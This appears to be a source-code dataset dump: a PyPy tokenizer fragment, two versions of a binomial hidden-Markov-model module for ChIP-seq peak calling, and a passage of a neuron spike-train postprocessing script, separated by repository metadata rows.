prefix = uniPrefix + rawPrefix
endDFAs[prefix + "'''"] = single3DFA
endDFAs[prefix + '"""'] = double3DFA
whiteSpaceStatesAccepts = [True]
whiteSpaceStates = [{'\t': 0, ' ': 0, '\x0c': 0}]
whiteSpaceDFA = automata.DFA(whiteSpaceStates, whiteSpaceStatesAccepts)
# ______________________________________________________________________
# COPIED:
triple_quoted = {}
for t in ("'''", '"""',
"r'''", 'r"""', "R'''", 'R"""',
"u'''", 'u"""', "U'''", 'U"""',
"b'''", 'b"""', "B'''", 'B"""',
"ur'''", 'ur"""', "Ur'''", 'Ur"""',
"uR'''", 'uR"""', "UR'''", 'UR"""',
"br'''", 'br"""', "Br'''", 'Br"""',
"bR'''", 'bR"""', "BR'''", 'BR"""'):
triple_quoted[t] = t
single_quoted = {}
for t in ("'", '"',
"r'", 'r"', "R'", 'R"',
"u'", 'u"', "U'", 'U"',
"b'", 'b"', "B'", 'B"',
"ur'", 'ur"', "Ur'", 'Ur"',
"uR'", 'uR"', "UR'", 'UR"',
"br'", 'br"', "Br'", 'Br"',
"bR'", 'bR"', "BR'", 'BR"'):
single_quoted[t] = t
tabsize = 8
# PYPY MODIFICATION: removed StopTokenizing class as it's not needed here
# PYPY MODIFICATION: removed tokenize() as it's not needed here
# PYPY MODIFICATION: removed generate_tokens() as it was copied / modified
# in pythonlexer.py
# PYPY MODIFICATION: removed main() as it's not needed here
| true | true |
1c3336890a8d0e233dbb651635e44b8a59ac72c8 | 7,181 | py | Python | src/rgt/THOR/binom_hmm.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | src/rgt/THOR/binom_hmm.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | src/rgt/THOR/binom_hmm.py | mguo123/pan_omics | e1cacd543635b398fb08c0b31d08fa6b7c389658 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
THOR detects differential peaks in multiple ChIP-seq profiles associated
with two distinct biological conditions.
Copyright (C) 2014-2016 Manuel Allhoff (allhoff@aices.rwth-aachen.de)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
@author: Manuel Allhoff
"""
from __future__ import print_function
import sys
import string
import numpy as np
from scipy.stats import binom
from hmmlearn.hmm import _BaseHMM
from help_hmm import _valid_posteriors
def get_init_parameters(s1, s2, **info):
    """Estimate initial binomial HMM parameters from two observation sets.

    Parameters
    ==========
    s1, s2: sequences of observation tuples; the first component of each
        element of s1 and the second component of each element of s2 are
        binned into histograms
    info: must contain 'count', the binomial number-of-trials parameter

    Returns
    =======
    (n_, p_): n_ is the per-dimension trial count (length 2); p_ has shape
    (2, 3), first index = emission dimension, second index = HMM state.
    """
    n_ = np.array([info['count'], info['count']])
    # The most frequent observation in each condition seeds the "active"
    # state's emission probability.  Use list comprehensions instead of
    # map(): under Python 3, map() returns an iterator, which np.bincount
    # rejects; a list works identically under Python 2.
    m_ = [float(np.argmax(np.bincount([x[0] for x in s1]))),
          float(np.argmax(np.bincount([x[1] for x in s2])))]
    p_ = [[-1, -1, -1], [-1, -1, -1]]  # first: 1. or 2. emission, second: state
    p_[0][0] = 1. / n_[0]
    p_[1][0] = 1. / n_[1]
    p_[0][1] = m_[0] / n_[0]
    p_[1][1] = p_[1][0]
    p_[0][2] = p_[0][0]
    p_[1][2] = m_[1] / n_[1]
    return np.asarray(n_), np.asarray(p_)
class BinomialHMM(_BaseHMM):
    """Hidden Markov model whose emissions are vectors of binomial counts.

    Each observation vector concatenates ``dim_cond_1`` columns from
    condition 1 followed by ``dim_cond_2`` columns from condition 2; all
    columns of condition j share the binomial parameters
    (n[j], p[j][state]).
    """

    def __init__(self, n, p, dim_cond_1, dim_cond_2, init_state_seq=None,
                 n_components=2, covariance_type='diag',
                 startprob_prior=None, transmat_prior=None,
                 algorithm="viterbi", means_prior=None, means_weight=0,
                 covars_prior=1e-2, covars_weight=1,
                 random_state=None, n_iter=10, thresh=1e-2,
                 params=string.ascii_letters,
                 init_params=string.ascii_letters):
        """Construct the model.

        Parameters
        ==========
        n: per-emission-dimension binomial trial counts (length 2)
        p: emission success probabilities, shape (2, n_components)
        dim_cond_1, dim_cond_2: observation columns per condition
        (remaining keyword arguments are forwarded to _BaseHMM; some, e.g.
        covariance_type/means_prior, are accepted for interface
        compatibility but unused here)
        """
        _BaseHMM.__init__(self, n_components,
                          startprob_prior=startprob_prior,
                          transmat_prior=transmat_prior, algorithm=algorithm,
                          random_state=random_state, n_iter=n_iter,
                          tol=thresh, params=params,
                          init_params=init_params)
        self.dim = [dim_cond_1, dim_cond_2]  # dimension of one emission
        self.n = n
        self.p = p
        self.n_features = 2  # emission dimension
        self.init_state_seq = init_state_seq
        self.count_s1, self.count_s2 = 0, 0
        # cache: (observed count, p, n) -> binom.logpmf value
        self.lookup_logpmf = {}

    def _compute_log_likelihood(self, X):
        """Return the (len(X), n_components) matrix of log P(x | state)."""
        res = []
        for x in X:  # over all observations
            row = []
            for i in range(self.n_components):  # over the HMM's states
                r_sum = 0
                for j in range(self.n_features):  # over emission dimensions
                    # columns of this observation belonging to condition j
                    it = range(self.dim[0]) if j == 0 \
                        else range(self.dim[0], self.dim[0] + self.dim[1])
                    for k in it:
                        index = (int(x[k]), self.p[j][i], self.n[j])
                        # dict.has_key() was removed in Python 3; `in` is
                        # equivalent under Python 2 as well.
                        if index not in self.lookup_logpmf:
                            self.lookup_logpmf[index] = binom.logpmf(
                                x[k], self.n[j], self.p[j][i])
                        r_sum += self.lookup_logpmf[index]
                row.append(r_sum)
            res.append(row)
        return np.asarray(res)

    def _generate_sample_from_state(self, state, random_state=None):
        """Draw one concatenated observation vector for a hidden state."""
        output = []
        for i, d in enumerate(self.dim):
            for _ in range(d):
                output.append(binom.rvs(self.n[i], self.p[i][state]))
        return np.asarray(output)

    def _initialize_sufficient_statistics(self):
        """Extend the base statistics with emission accumulators."""
        stats = super(BinomialHMM, self)._initialize_sufficient_statistics()
        stats['post'] = np.zeros([self.n_components])
        stats['post_emission'] = np.zeros([self.n_features,
                                           self.n_components])
        return stats

    def _help_accumulate_sufficient_statistics(self, obs, stats, posteriors):
        """Accumulate posterior-weighted emission counts for the M-step."""
        for t, symbol in enumerate(obs):
            # consider both conditions
            pot_it = [range(self.dim[0]),
                      range(self.dim[0], self.dim[0] + self.dim[1])]
            for j, it in enumerate(pot_it):
                for i in it:
                    stats['post'] += posteriors[t]
                    stats['post_emission'][j] += posteriors[t] * symbol[i]
        stats['posterior'] = np.copy(posteriors)

    def _accumulate_sufficient_statistics(self, stats, obs, framelogprob,
                                          posteriors, fwdlattice,
                                          bwdlattice):
        super(BinomialHMM, self)._accumulate_sufficient_statistics(
            stats, obs, framelogprob, posteriors, fwdlattice, bwdlattice
        )
        # Sanitize posteriors before folding them into the statistics.
        posteriors = _valid_posteriors(posteriors, obs, self.dim)
        self._help_accumulate_sufficient_statistics(obs, stats, posteriors)

    @staticmethod
    def _add_pseudo_counts(arr):
        """Clamp a scalar or array away from exact zero (>= 1e-323).

        BUGFIX: the original definition lacked both ``self`` and
        ``@staticmethod``, so the call ``self._add_pseudo_counts(x)`` in
        _help_do_mstep passed ``self`` as ``arr`` and raised TypeError.
        """
        if type(arr) is np.ndarray:
            tmp = np.array([1e-323 if x < 1e-323 else x for x in arr],
                           np.float64)
            # tmp2 = np.array([1.0 - 1.0e-5 if x == 1.0 else x for x in tmp], np.float64)
            return tmp
        else:
            tmp = 1e-323 if arr < 1e-323 else arr
            # tmp2 = 1.0 - 1.0e-10 if tmp == 1.0 else tmp
            return tmp

    def _help_do_mstep(self, stats):
        """Re-estimate emission probabilities from accumulated statistics."""
        for i in range(self.n_features):
            self.p[i] = stats['post_emission'][i] / \
                (self.n[i] * self._add_pseudo_counts(stats['post']))
            print('help_m_step', i, stats['post_emission'][i], stats['post'],
                  self.p[i], file=sys.stderr)

    def _do_mstep(self, stats):
        super(BinomialHMM, self)._do_mstep(stats)
        self._help_do_mstep(stats)
        # NOTE(review): ties emission parameters across dimensions/states —
        # presumably enforcing symmetry between the two conditions' active
        # states; confirm against the model derivation.
        self.p[0, 0] = self.p[1, 0]
        self.p[0, 1] = self.p[1, 2]
        self.p[1, 1] = self.p[0, 2]
if __name__ == '__main__':
    # Smoke test: sample from a known 3-state binomial HMM, then fit a
    # second model started from perturbed emission probabilities and
    # compare decoded states against the true hidden sequence.
    p_ = np.array([[0.01, 0.8, 0.1], [0.01, 0.1, 0.8]])
    n_ = np.array([100, 100])
    m = BinomialHMM(n_components=3, p = p_, startprob=[1,0,0], n = n_, dim_cond_1=2, dim_cond_2=4)
    X, Z = m.sample(100) #returns (obs, hidden_states)
    # Deliberately different starting parameters for the fit.
    p_ = np.array([[0.1, 0.7, 0.3], [0.1, 0.2, 0.9]])
    n_ = np.array([100, 100])
    m2 = BinomialHMM(n_components=3, n=n_, p=p_, dim_cond_1=2, dim_cond_2=4)
    #cProfile.run("m2.fit([X])")
    m2.fit([X])
    e = m2.predict(X)
    print(m2.p)
    # Per-sample comparison: observation, true state, estimated state, match.
    for i, el in enumerate(X):
        print(el, Z[i], e[i], Z[i] == e[i], sep='\t')
#     logprob, posteriors = m2.eval(X)
#     print('logprob:', logprob)
#     print('posteriors:', posteriors)
#     print('estim. states ', m2.predict(X))
#     print(m2.predict_proba(X))
#     print(m2.n)
#     print(m2.p)
#     print(m2._get_transmat())
#     init_state = m2.predict(X)
#     m3 = BinomialHMM2d3s(n_components=3, n=n_)
#     m3.fit([X], init_params='advanced')
#     print(m3._get_transmat())
#     print(m3.p)
#     m2.eval(X)
from __future__ import print_function
import sys
import string
import numpy as np
from scipy.stats import binom
from hmmlearn.hmm import _BaseHMM
from help_hmm import _valid_posteriors
def get_init_parameters(s1, s2, **info):
n_ = np.array([info['count'], info['count']])
m_ =[float(np.argmax(np.bincount(map(lambda x: x[0], s1)))), float(np.argmax(np.bincount(map(lambda x: x[1], s2)))) ]
p_ = [[-1,-1,-1],[-1,-1,-1]]
p_[0][0] = 1. / n_[0]
p_[1][0] = 1. / n_[1]
p_[0][1] = m_[0] / n_[0]
p_[1][1] = p_[1][0]
p_[0][2] = p_[0][0]
p_[1][2] = m_[1] / n_[1]
return np.asarray(n_), np.asarray(p_)
class BinomialHMM(_BaseHMM):
def __init__(self, n, p, dim_cond_1, dim_cond_2, init_state_seq=None, n_components=2, covariance_type='diag', startprob_prior=None, transmat_prior=None,
algorithm="viterbi", means_prior=None, means_weight=0,
covars_prior=1e-2, covars_weight=1,
random_state=None, n_iter=10, thresh=1e-2,
params=string.ascii_letters,
init_params=string.ascii_letters):
_BaseHMM.__init__(self, n_components,
startprob_prior=startprob_prior,
transmat_prior=transmat_prior, algorithm=algorithm,
random_state=random_state, n_iter=n_iter,
tol=thresh, params=params,
init_params=init_params)
self.dim = [dim_cond_1, dim_cond_2]
self.n = n
self.p = p
self.n_features = 2
self.init_state_seq = init_state_seq
self.count_s1, self.count_s2 = 0, 0
self.lookup_logpmf = {}
def _compute_log_likelihood(self, X):
res = []
for x in X:
row = []
for i in range(self.n_components):
r_sum = 0
for j in range(self.n_features): #over dim
it = range(self.dim[0]) if j == 0 else range(self.dim[0], self.dim[0] + self.dim[1]) #grab proper observation
for k in it:
index = (int(x[k]), self.p[j][i], self.n[j])
if not self.lookup_logpmf.has_key( index ):
self.lookup_logpmf[index] = binom.logpmf(x[k], self.n[j], self.p[j][i])
r_sum += self.lookup_logpmf[index]
row.append(r_sum)
res.append(row)
return np.asarray(res)
def _generate_sample_from_state(self, state, random_state=None):
output = []
for i, d in enumerate(self.dim):
for _ in range(d):
output.append( binom.rvs(self.n[i], self.p[i][state]) )
return np.asarray(output)
def _initialize_sufficient_statistics(self):
stats = super(BinomialHMM, self)._initialize_sufficient_statistics()
stats['post'] = np.zeros([self.n_components])
stats['post_emission'] = np.zeros([self.n_features, self.n_components])
return stats
def _help_accumulate_sufficient_statistics(self, obs, stats, posteriors):
for t, symbol in enumerate(obs):
pot_it = [range(self.dim[0]), range(self.dim[0], self.dim[0] + self.dim[1])] #consider both classes
for j, it in enumerate(pot_it):
for i in it:
stats['post'] += posteriors[t]
stats['post_emission'][j] += posteriors[t] * symbol[i]
stats['posterior'] = np.copy(posteriors)
def _accumulate_sufficient_statistics(self, stats, obs, framelogprob,
posteriors, fwdlattice, bwdlattice
):
super(BinomialHMM, self)._accumulate_sufficient_statistics(
stats, obs, framelogprob, posteriors, fwdlattice, bwdlattice
)
posteriors = _valid_posteriors(posteriors, obs, self.dim)
self._help_accumulate_sufficient_statistics(obs, stats, posteriors)
def _add_pseudo_counts(arr):
if type(arr) is np.ndarray:
tmp = np.array([1e-323 if x < 1e-323 else x for x in arr], np.float64)
# tmp2 = np.array([1.0 - 1.0e-5 if x == 1.0 else x for x in tmp], np.float64)
return tmp
else:
tmp = 1e-323 if arr < 1e-323 else arr
# tmp2 = 1.0 - 1.0e-10 if tmp == 1.0 else tmp
return tmp
def _help_do_mstep(self, stats):
for i in range(self.n_features):
self.p[i] = stats['post_emission'][i] / (self.n[i] * self._add_pseudo_counts(stats['post']))
print('help_m_step', i, stats['post_emission'][i], stats['post'], self.p[i], file=sys.stderr)
def _do_mstep(self, stats):
super(BinomialHMM, self)._do_mstep(stats)
self._help_do_mstep(stats)
self.p[0,0] = self.p[1,0]
self.p[0,1] = self.p[1,2]
self.p[1,1] = self.p[0,2]
if __name__ == '__main__':
p_ = np.array([[0.01, 0.8, 0.1], [0.01, 0.1, 0.8]])
n_ = np.array([100, 100])
m = BinomialHMM(n_components=3, p = p_, startprob=[1,0,0], n = n_, dim_cond_1=2, dim_cond_2=4)
X, Z = m.sample(100) #returns (obs, hidden_states)
p_ = np.array([[0.1, 0.7, 0.3], [0.1, 0.2, 0.9]])
n_ = np.array([100, 100])
m2 = BinomialHMM(n_components=3, n=n_, p=p_, dim_cond_1=2, dim_cond_2=4)
#cProfile.run("m2.fit([X])")
m2.fit([X])
e = m2.predict(X)
print(m2.p)
for i, el in enumerate(X):
print(el, Z[i], e[i], Z[i] == e[i], sep='\t')
# logprob, posteriors = m2.eval(X)
# print('logprob:', logprob)
# print('posteriors:', posteriors)
# print('estim. states ', m2.predict(X))
# print(m2.predict_proba(X))
# print(m2.n)
# print(m2.p)
# print(m2._get_transmat())
# init_state = m2.predict(X)
# m3 = BinomialHMM2d3s(n_components=3, n=n_)
# m3.fit([X], init_params='advanced')
# print(m3._get_transmat())
# print(m3.p)
# m2.eval(X)
| true | true |
1c3337b4228671c7b2f5d125c8ec33d2f9fa971e | 26,053 | py | Python | postprocessing_preBotBot/doPost.py | JoshMend/prebotc-graph-model | 4002e51ab965be366b30c2a6d900ac288fa41245 | [
"BSD-3-Clause"
] | null | null | null | postprocessing_preBotBot/doPost.py | JoshMend/prebotc-graph-model | 4002e51ab965be366b30c2a6d900ac288fa41245 | [
"BSD-3-Clause"
] | null | null | null | postprocessing_preBotBot/doPost.py | JoshMend/prebotc-graph-model | 4002e51ab965be366b30c2a6d900ac288fa41245 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
'''
This file does all the post processing for a given mat file at once. This includes:
1) Deleting the transient
2) Binning the spikes
3) Filtering the spikes with a gaussian kernel
4) Smoothing with a butterworth filter to remove high-frequency signals
5) Finding the phase lag and population correlation
'''
import sys
import numpy as np
import scipy.signal
import scipy.io
import argparse
import networkx as nx
import matplotlib.pyplot as plt
import cmath
import math
# Module-level analysis constants.
maxorder=20  # NOTE(review): not used in this chunk — presumably a maximum lag/order bound for later analysis; confirm downstream
eta_norm_pts = 10  # module default; note parse_args() returns its own local eta_norm_pts = 8
def parse_args(argv):
    """Parse command-line arguments for the postprocessing run.

    Parameters
    ==========
    argv: full argument vector (argv[0] is the program name, as in sys.argv)

    Returns
    =======
    15-tuple: (sim, output, transient, sec, thresh, f_sigma, butter_low,
    butter_high, bin_width, cutoff, volt, peak_order, peak_percentile,
    eta_norm_pts, op_abs_thresh)

    The peak/order-parameter settings, previously hard-coded, are now
    exposed as optional flags with unchanged defaults, so existing callers
    see identical behavior.
    """
    # defaults
    transient = 10000       # ms
    spike_thresh = -20      # mV
    f_sigma = 20            # ms
    butter_high = 4         # Hz
    butter_low = -np.inf    # Hz
    bin_width = 20          # ms
    cutoff = 0.5
    peak_order = 30         # bins
    peak_percentile = 75
    eta_norm_pts = 8        # intentionally shadows the module-level default
    op_abs_thresh = 0.2
    # parsing
    parser = argparse.ArgumentParser(prog="doPost",
                                     description=('Postprocessing of'
                                                  ' model output'))
    parser.add_argument('sim', help='model output (.mat) file')
    parser.add_argument('output', help='output (.jpg) filename')
    parser.add_argument('--transient', '-t',
                        help='transient time, ms (default: %(default)s)',
                        type=float, default=transient)
    parser.add_argument('--sec', '-s', action='store_true',
                        help='time units are in seconds (default: ms)')
    parser.add_argument('--volt', '-V', action='store_true',
                        help=('file contains voltage traces '
                              '(default: sparse spike trains)'))
    parser.add_argument('--thresh',
                        help='spike threshold, mV (default: %(default)s)',
                        type=float, default=spike_thresh)
    parser.add_argument('--fsig', '-f',
                        help=('filter standard deviation, ms '
                              '(default: %(default)s)'),
                        type=float, default=f_sigma)
    parser.add_argument('--butter_high',
                        help=('Butterworth filter upper cutoff frequency, Hz '
                              '(default: %(default)s)'),
                        type=float, default=butter_high)
    parser.add_argument('--butter_low',
                        help=('Butterworth filter lower cutoff frequency, Hz '
                              '(default: %(default)s)'),
                        type=float, default=butter_low)
    parser.add_argument('--bin_width', '-b',
                        help='bin width, ms (default: %(default)s)',
                        type=float, default=bin_width)
    parser.add_argument('--cut', '-c',
                        help='burst cutoff parameter (default: %(default)s)',
                        type=float, default=cutoff)
    # Previously hard-coded analysis parameters, now configurable.
    parser.add_argument('--peak_order',
                        help=('peak detection window, bins '
                              '(default: %(default)s)'),
                        type=int, default=peak_order)
    parser.add_argument('--peak_percentile',
                        help=('peak detection percentile '
                              '(default: %(default)s)'),
                        type=float, default=peak_percentile)
    parser.add_argument('--eta_norm_pts',
                        help=('number of eta normalization points '
                              '(default: %(default)s)'),
                        type=int, default=eta_norm_pts)
    parser.add_argument('--op_abs_thresh',
                        help=('order parameter magnitude threshold '
                              '(default: %(default)s)'),
                        type=float, default=op_abs_thresh)
    args = parser.parse_args(argv[1:])
    return (args.sim, args.output, args.transient, args.sec, args.thresh,
            args.fsig, args.butter_low, args.butter_high, args.bin_width,
            args.cut, args.volt, args.peak_order, args.peak_percentile,
            args.eta_norm_pts, args.op_abs_thresh)
'''
This method chops of the transient stage of the data for better processing
parameters: data-Data being passed in to chop
transient- time and which you want to chop till
dt-the change in time of the model
return: The modified data excluding transient stage
'''
def chop_transient(data, transient, dt):
    """Discard the initial transient portion of a recording.

    Parameters
    ----------
    data : ndarray, shape (num_neurons, num_times)
    transient : duration to discard, in the same time units as dt
    dt : sampling period

    Returns
    -------
    ndarray with the leading transient columns removed.
    """
    start_col = int(np.ceil(transient / dt) - 1)
    return data[:, start_col:]
'''
Find spikes in voltage data by taking relative maxima
parameters: data- self-explanatory
            threshold- The voltage at which you start to count data as a spike
return: new_indices-location of the maxima
spike_mat-dense matrix containing 1 or 0 based on if a spike is present
'''
def find_spikes(data, threshold):
    """Find spikes in voltage traces as suprathreshold relative maxima.

    Parameters
    ==========
    data: ndarray (num_neurons x num_times) of voltage traces
    threshold: voltage above which a relative maximum counts as a spike
    Returns
    =======
    new_indices: (row_indices, col_indices) of the detected spikes
    spike_mat: dense 0/1 matrix, same shape as data, 1 where a spike occurs
    """
    indices = scipy.signal.argrelmax(data, axis=1)  # 1st and 2nd coords of maxima
    mask = np.where(data[indices] > threshold)
    new_indices = (indices[0][mask],
                   indices[1][mask])
    # BUGFIX: np.int was removed in NumPy 1.24; the builtin int is the
    # exact same dtype it aliased.
    spike_mat = np.zeros(np.shape(data), dtype=int)  # dense format
    spike_mat[new_indices] = 1
    return new_indices, spike_mat
'''
Return time indices of spiking of a given neuron
'''
def spikes_of_neuron(spikes, neuron):
    """Return the spike-time indices belonging to one neuron.

    spikes is a (neuron_indices, time_indices) pair as produced by
    find_spikes; the result is the subset of time indices whose
    corresponding neuron index equals `neuron`.
    """
    neuron_mask = np.where(spikes[0] == neuron)
    return spikes[1][neuron_mask]
'''
Filter the spike timeseries. Returns both neuron-by-neuron timeseries
filtered with a gaussian kernel and the population data filtered
with a butterworth filter.
Parameters
==========
spike_mat: the numneuron x time matrix of spikes
samp_freq: sample frequency
f_sigma: variance of gaussian
butter_freq: butterworth filter cutoff frequency(s)
Returns
=======
spike_fil: gaussian filtered matrix, same shape as spike_mat
int_signal: butterworth filtered population timeseries
spike_fil_butter: butterworth filtered matrix, same shape as spike_mat
'''
def spikes_filt(spike_mat, samp_freq, f_sigma, butter_freq):
    '''
    Filter the spike timeseries. Returns both neuron-by-neuron timeseries
    filtered with a gaussian kernel and the population data filtered
    with a butterworth filter.
    Parameters
    ==========
    spike_mat: the numneuron x time matrix of spikes
    samp_freq: period (in ms) between measurements in spike_mat
    f_sigma: variance of gaussian
    butter_freq: butterworth filter cutoff frequency(s)
    Returns
    =======
    spike_fil: gaussian filtered matrix, same shape as spike_mat
    int_signal: butterworth filtered population timeseries
    spike_fil_butter: butterworth filtered matrix, same shape as spike_mat
    '''
    def filt_window_gauss(samp_freq, std = 20, width = None, normalize = 1):
        # Build a Gaussian window; std/width are given in ms and converted
        # into samples by dividing by the sampling period.
        if width is None:
            width = std*4+1
        width /= samp_freq
        std /= samp_freq
        # NOTE(review): width can be fractional after the division above;
        # scipy.signal.gaussian truncates it -- confirm this is intended.
        w = scipy.signal.gaussian(width, std)
        if not normalize == 0:
            # Scale the window to have area equal to `normalize`.
            w = normalize * w / sum(w)
        return w
    def filt_gauss(spike_mat, samp_freq, f_sigma=20):
        # Smooth each neuron's spike train with the Gaussian window.
        # FFT convolution with mode='same' keeps the input length.
        w = filt_window_gauss(samp_freq, std=f_sigma, normalize=1)
        spike_fil = scipy.signal.fftconvolve(spike_mat, w[ np.newaxis, : ],
                                             mode='same')
        #spike_fil = scipy.signal.convolve(spike_mat, w[ np.newaxis, : ],
        #                                  mode='same')
        return spike_fil
    def filt_butter(data, samp_freq, butter_freq, axis=-1):
        '''
        Filter data with a 2nd order butterworth filter.
        Parameters
        ==========
        data: ndarray
        samp_freq: sampling period (s)
        butter_freq: [cutoff_low, cutoff_high] (Hz), can be infinite
        axis (optional): axis along which to filter, default = -1
        Returns
        =======
        filtNs: filtered version of data
        '''
        order = 2
        ny = 0.5 / samp_freq # Nyquist frequency
        cof = butter_freq / ny # normalized cutoff freq
        # Pick the filter type from which cutoffs are finite.
        if np.isneginf(cof[0]) and np.isfinite(cof[1]):
            # lowpass
            cof1 = cof[1]
            b, a = scipy.signal.butter(order, cof1, btype='low')
            filtNs = scipy.signal.filtfilt(b, a, data, axis=axis)
        elif np.isfinite(cof[0]) and np.isinf(cof[1]):
            # highpass
            cof1 = cof[0]
            b, a = scipy.signal.butter(order, cof1, btype='high')
            filtNs = scipy.signal.filtfilt(b, a, data, axis=axis)
        elif np.isfinite(cof[0]) and np.isfinite(cof[1]):
            # bandpass
            b, a = scipy.signal.butter(order, cof, btype='band')
            filtNs = scipy.signal.filtfilt(b, a, data, axis=axis)
        else:
            raise Exception('filt_butter called with bad cutoff frequency')
        filtNs /= samp_freq # normalize to rate
        return filtNs
    spike_fil = filt_gauss(spike_mat, samp_freq, f_sigma=f_sigma)
    # Population signal: average across neurons, then Butterworth-filter.
    # samp_freq is in ms while filt_butter expects seconds, hence the 1e-3.
    int_signal = filt_butter(np.mean(spike_mat, axis=0),
                             samp_freq*1e-3, butter_freq)
    spike_fil_butter = filt_butter(spike_fil, samp_freq*1e-3,
                                   butter_freq, axis=1)
    return spike_fil, int_signal, spike_fil_butter
'''
Bin spikes
Parameters
==========
spike_mat: matrix of spikes, (num_neuron x num_time)
bin_width: bin width in time units
dt: sampling frequency in spike mat
Returns
=======
bins: an array of the bin locations in time units
binned_spikes: a new matrix (num_neuron x num_bins)
'''
def bin_spikes(spike_mat, bin_width, dt):
    """Bin spikes into fixed-width time bins.

    Parameters
    ==========
    spike_mat: matrix of spikes, (num_neuron x num_time)
    bin_width: bin width in time units
    dt: sampling period of spike_mat, same time units
    Returns
    =======
    bins: array of bin start positions (in samples)
    binned_spikes: (num_neuron x num_bins) spike counts per bin
    """
    num_neurons = np.shape(spike_mat)[0]
    num_times = np.shape(spike_mat)[1]
    stride = int(np.ceil(bin_width / dt))
    # BUGFIX: np.float/np.int were removed in NumPy 1.24; the builtins are
    # the exact dtypes those aliases referred to.
    bins = np.arange(0, num_times, stride, dtype=float)
    which_bins = np.digitize(range(0, num_times), bins)
    num_bins = len(bins)
    binned_spikes = np.zeros((num_neurons, num_bins), dtype=int)
    for i in range(num_bins):
        bin_mask = np.where(which_bins == i)[0]  # mask data in bin i, tuple
        bin_data = spike_mat[:, bin_mask]
        binned_spikes[:, i] = np.sum(bin_data, axis=1).flatten()
    return bins, binned_spikes
'''
This is computes the cross correlation for two signals
paramters:
signal_1: first signal you want to use
signal_2: second signal you want to use
taolen: this number determines how much of the tao to use
returns:
values of the cross correlation
'''
def xcorr(signal_1,signal_2):
    """Normalized cross-correlation of two signals.

    Both signals are mean-centered so the correlation reflects
    co-fluctuation rather than baseline offsets; the scaling by
    std and length makes the zero-lag autocorrelation of a signal
    with itself equal to 1.
    """
    first = np.asarray(signal_1)
    second = np.asarray(signal_2)
    first_scaled = (first - np.mean(first)) / (np.std(first) * len(first))
    second_scaled = (second - np.mean(second)) / np.std(second)
    return scipy.signal.correlate(first_scaled, second_scaled)
'''
Gets info from the graph to be used for plotting
'''
def get_graphinfo(graph_fn):
    """Load the network graph and extract metadata used for plotting.

    Parameters
    ==========
    graph_fn: path to a GML graph file
    Returns
    =======
    cells_inhib: int array of each node's 'inh' attribute
    graph_edges: list of graph edges
    number_of_nodes: node count
    degree_histogram: list, degree_histogram[d] = number of nodes of degree d
    """
    graph = nx.read_gml(graph_fn)
    # BUGFIX: under Python 3, dict.values() is a view; np.array(view) builds
    # a useless 0-d object array, so materialize it as a list first.
    # (np.int was also removed in NumPy 1.24; builtin int is equivalent.)
    cells_inhib = np.array(list(nx.get_node_attributes(graph, 'inh').values()),
                           dtype=int)
    graph_edges = nx.edges(graph)
    number_of_nodes = nx.number_of_nodes(graph)
    degree_histogram = nx.degree_histogram(graph)
    return cells_inhib, graph_edges, number_of_nodes, degree_histogram
'''
This method gets the time at which the peak occurs for a signal
goes through the given peak_times and finds at which point the signal is the
strongest
peak_times: the times at which a peak in the signal occurs
signal: The signal that you want to find the max of
'''
def find_max_time(peak_times,signal):
    """Return the peak time at which the signal is strongest.

    Scans the candidate peak times and keeps the one with the largest
    signal value; returns NaN when peak_times is empty.
    """
    best = np.nan
    for candidate in peak_times:
        # Short-circuit keeps us from indexing with NaN on the first pass.
        if np.isnan(best) or signal[candidate] > signal[best]:
            best = candidate
    return best
'''
This method finds the phase lag and population correlation for the data given. Use the max peak from the autocorrelation and then the cross correlation peak in the middle of those two
input:
xcorr-The cross correlation signal
autocorr-An autocorrelations signal to be ran against
output:
phase-The phase lag/difference between two populations
pop_corr-The correlation between both signals
'''
def find_metrics(xcorr,autocorr):
    '''
    Compute the phase lag and population correlation between two signals.
    The reference period runs from the autocorrelation's strongest peak to
    its next positive peak; the phase is the fractional position of the
    first positive cross-correlation peak within that period.
    '''
    max_time_cross = np.nan;
    peak_auto = scipy.signal.argrelmax(autocorr)[0].tolist()
    peak_cross = scipy.signal.argrelmax(xcorr)[0].tolist()
    # Strongest autocorrelation peak marks the start of the reference period.
    max_time = find_max_time(peak_auto,autocorr)
    # Next positive autocorrelation peak marks the end of the period.
    # NOTE(review): if no later positive peak exists, max_time_next is never
    # bound and the code below raises UnboundLocalError -- confirm inputs
    # always contain one.
    for i in range(peak_auto.index(max_time)+1,len(peak_auto)):
        if autocorr[peak_auto[i]] > 0:
            max_time_next = peak_auto[i]
            break
    # First positive cross-correlation peak strictly inside the period.
    # NOTE(review): if none is found, max_time_cross stays NaN and the
    # indexing in the return statement will fail.
    for x in peak_cross:
        if x > max_time and x < max_time_next and xcorr[x] > 0:
            max_time_cross = x
            break
    auto_period = max_time_next - max_time
    auto_cross_perioid = max_time_cross - max_time
    phase = float(auto_cross_perioid)/float(auto_period)
    return phase, xcorr[max_time_cross]
'''
This method finds the population burst peaks for a given signal, using a percentile filter to eliminate noisy peaks
input:
signal-This is the signal you want to find the peaks of
peak_order-The number of points of comparison for each peak on each side of the current value
peak_percentile-The percentage threshold the peak must meet
dt-The time step
output:
pop_burst_peak-Peaks of the signal that pass the given criteria for a peak
'''
def burst_stats(signal,peak_order,peak_percentile,dt):
    """Locate population-burst peaks in a signal.

    A sample is a burst peak when it is a relative maximum over
    `peak_order` neighbors on each side AND exceeds the signal's
    `peak_percentile`-th percentile (filters out noise-level maxima).
    `dt` is unused here but kept for interface compatibility.
    """
    candidate_peaks = scipy.signal.argrelmax(signal, order=peak_order)[0]
    height_floor = np.percentile(signal, peak_percentile)
    return candidate_peaks[signal[candidate_peaks] > height_floor]
'''
This method is used to get the phi (phase differences) between signals,
here we use a moving window to find the refrence perioid to calculate phi
input:
pop_burst_peak1(2)-This is the time for the peaks from signal 1 or signal 2
bins-This is the bin info for the signals after some post processing
output:
phis-List of phis for the signals
'''
